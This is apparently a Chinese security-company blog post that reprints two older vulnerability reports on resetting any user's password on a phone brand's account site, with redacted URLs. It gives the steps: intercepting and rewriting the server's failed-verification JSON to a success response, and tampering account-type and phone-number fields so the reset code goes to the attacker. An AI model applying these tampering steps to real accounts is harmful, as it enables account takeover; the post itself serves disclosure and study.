本地验证
案例:某品牌手机重置任意用户密码漏洞(4)
某品牌手机之前我自己发过重置的3次了,别人也以不同姿势重置了N次,简直..
今天看到noob又提交了一个,于是再去看看。
审核的时候麻烦先帮我看看与http://www.xxxx.xxx/xxx/xxx-2014-069xxx 是否重复,如重复勿过。
详细说明:
https://xxx.xxx.com/xxx.xxx?q=user/getbackpass&back=http%3A%2F%2Fwww.xxxx.com%2F
找回密码,输入要找回的手机号,以找回手机号:1372378xxxx示例
https://xxx.xxx.com/xxx.xxx?q=user/confirmid&type=1&sign=e9fb209c9416fb0312980c47c4537f0b
获取验证码-随便输入一个验证码,提交确认的时候response拦截
收到响应:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Jul 2014 04:15:39 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: Zandy/1.0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 28 Jul 2014 04:15:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Server-ID: web106
Content-Length: 56
{"flag":-4,"msg":"\u9a8c\u8bc1\u7801\u4e0d\u6b63\u786e"}
修改为:
{"flag":1,"msg":"?q=user\/resetPass&username=&type=1&sign=e9fb209c9416fb0312980c47c4537f0b"}
Forward出去响应包,即可绕过重置验证。
设置密码,直接提交,帐号密码为 1372378xxxx:wooxxx123
案例:某品牌手机修改任意帐号密码-2
1.使用找回密码功能,输入指定要找回密码的帐户,本次测试以官方帐号“某品牌手机社区”为例,使用抓包工具抓包
返回如下数据包
2.将数据包中的acctype值改为1,去掉email,修改mobie为自己的手机号码
继续提交
3.自己的手机将会收到验证码,填入收到的验证码和新密码即可完成
关注路劲科技,关注网络安全!
CVE-2020-0796检测与修复
我最近偶遇的六个很酷的Python库
招募令| 别看别看,一篇“三无”招聘文章,请慎重点击